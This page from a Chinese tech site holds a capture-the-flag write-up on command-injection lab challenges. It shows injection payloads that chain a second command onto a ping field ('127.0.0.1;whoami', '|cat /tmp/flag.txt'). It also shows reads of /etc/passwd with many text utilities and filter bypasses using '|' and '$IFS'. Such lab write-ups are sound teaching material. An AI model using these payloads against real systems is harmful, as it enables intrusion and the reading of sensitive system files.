网站首页 全球最实用的IT互联网站!

人工智能P2P分享Wind搜索发布信息网站地图标签大全

当前位置:诺佳网 > 软件工程 > 其他技术区 > 网络安全 >

test

时间:2026-02-25 02:08

人气:

作者:admin

标签:

导读:命令执行漏洞wp 好靶场 top10 命令执行Demo 简单的查看文件命令,也即 cat 文件 题目告诉你在那个文件夹 故直接查看 cat /tmp/flag.txt 结束 命令执行漏洞体验 题目提示在 /tmp/flag.txt 所以我们需...

好靶场

top10

命令执行Demo

简单的查看文件命令,也即 cat 文件

题目告诉你在那个文件夹

故直接查看

image-20251117161014245

cat /tmp/flag.txt

image-20251117161041992

结束

命令执行漏洞体验

题目提示在 /tmp/flag.txt 所以我们需要优先的想办法查找这个文件

image-20251118142457114

入口是一个ping 命令,故我们可以 先用ip地址来看看是否有反应

输入127.0.01 来查看,说明连接成功

我们用连接符号来查询自己用户权限

用户权限:root

127.0.0.1;whoami

image-20251118142922104

测试成功,接下来用cat 来查看文件

127.0.0.;cat /tmp/flag.txt

image-20251118143438944

结束

命令执行漏洞,我过滤了;符号,你还有其他的办法吗

提示你过滤了 ; 那我们使用其他连接符

先看有无成功

输入 127.2

(当我们没有提示2,为ip第2 3 位的时候,系统会默认 2 3 位是0 )

image-20251118144544015

查看权限:root

127.2|whoami

image-20251118144726974

查看文件:

127.2|cat /tmp/flag.txt

image-20251118144825599

结束

cat命令执行

直接输入cat /tmp/flag.txt

image-20251118145102270

image-20251118145120582

tac命令执行

输入tac /tmp/flag.txt

image-20251118145236375

head命令执行

查看用户权限

head /etc/passwd

image-20251118145812975

查看flag

head /tmp/flag.txt

image-20251118145850861

more命令执行

more /etc/passwd

查看敏感内容

image-20251118150657366

more /tmp/flag.txt

查看flag

image-20251118150814926

less命令执行

Flag在/tmp/flag.txt

less /etc/passwd

查看文件

image-20251118151028887

查看flag

image-20251118151449638

nl命令执行

nl /etc/passwd 发现前面都有了编号

image-20251118152151121

nl /tmp/flag.txt

查看flag

image-20251118152456721

sort命令执行

sort /etc/passwd

发现文件被排序输出了

image-20251118152823914

sort /tmp/flag.txt 查看flag

image-20251118152902861

uniq命令执行

uniq /etc/passwd 查看文件

将重复的行删除打印出来

image-20251118154401142

uniq /tmp/flag.txt 查看flag

image-20251118154337214

od命令执行

od -c /etc/passwd 即可查看文件

以ASCII码的方式指定出来

image-20251118160534455

od -c /tmp/flag.txt 查看flag

image-20251118160607147

到在线的空格去除平台中,将地址偏移量删除,再提交flag

image-20251118161014531

xxd命令执行

输入xxd -c -40 /tmp/flag.txt 即可查看到flag

指定为40 个字符在同一行打印出来

image-20251118163018762

hexdump命令执行

hexdump -C /tmp/flag.txt

将地址偏移 16进制 和ASCII码都能打印出来

image-20251118170840234

base32命令执行

base32 /tmp/flag.txt

将其base32加密后打印

image-20251118174209841

放到在线解密平台即可

image-20251118174308791

base64命令执行

base64 /tmp/flag.txt

将其base64加密后打印

image-20251118174452462

在线平台解码

image-20251118174737616

strings命令执行

strings /tmp/flag.txt

在这个文件中提取可打印的字符

image-20251118175105749

grep命令执行

grep f /tmp/flag.txt

指定文件查询指定文本

image-20251118182932396

cp命令执行

cp /tmp/flag.txt /dev/stdout

把这个flag文件 移动到/dev/stdout 的伪文件之中

/dev/stdout 这个伪文件的作用就是将其打印出来

image-20251118192143357

find命令执行

find /tmp -name flag.txt -exec cat {} ;

查看当前的目录并使用cat命令

image-20251118193520540

mv命令执行

pwd 查看当前界面的使用的

image-20251118210433373

mv /tmp/flag.txt /var/www/html

将其改变到该界面的文件夹中

最后我们在网址访问即可

image-20251118211203729

运维系统命令执行

界面发现是一个ping命令 我们点击其他 的发现不可以,

image-20251118211508212

尝试输入正确域名

image-20251118211636744

一直在转

故在后面使用连接符号尝试其他的命令

127.0.0.1;cat /tmp/flag.txt

查找到flag

image-20251118211415561

你的空格被我拦截了

题目告诉你空格被拦截,打开后发现是一个ping命令,故我们先用不需要空格的whoami命令,来查看有没有连接符号被拦截了

发现;被拦截,故用其他的连接符号

127.0.0.1;whoami

image-20251118224616056

127.0.0.1|whoami

发现可行,我们就可以用| 来进行命令连接

image-20251118231239245

我们用变量函数$IFS来进行绕过

127.0.0.1|cat$IFS/tmp/flag.txt

image-20251118232011463

温馨提示:以上内容整理于网络,仅供参考,如果对您有帮助,留下您的阅读感言吧!
相关阅读
本类排行
相关标签
本类推荐

CPU | 内存 | 硬盘 | 显卡 | 显示器 | 主板 | 电源 | 键鼠 | 网站地图

Copyright © 2025-2035 诺佳网 版权所有 备案号:赣ICP备2025066733号
本站资料均来源互联网收集整理,作品版权归作者所有,如果侵犯了您的版权,请跟我们联系。

关注微信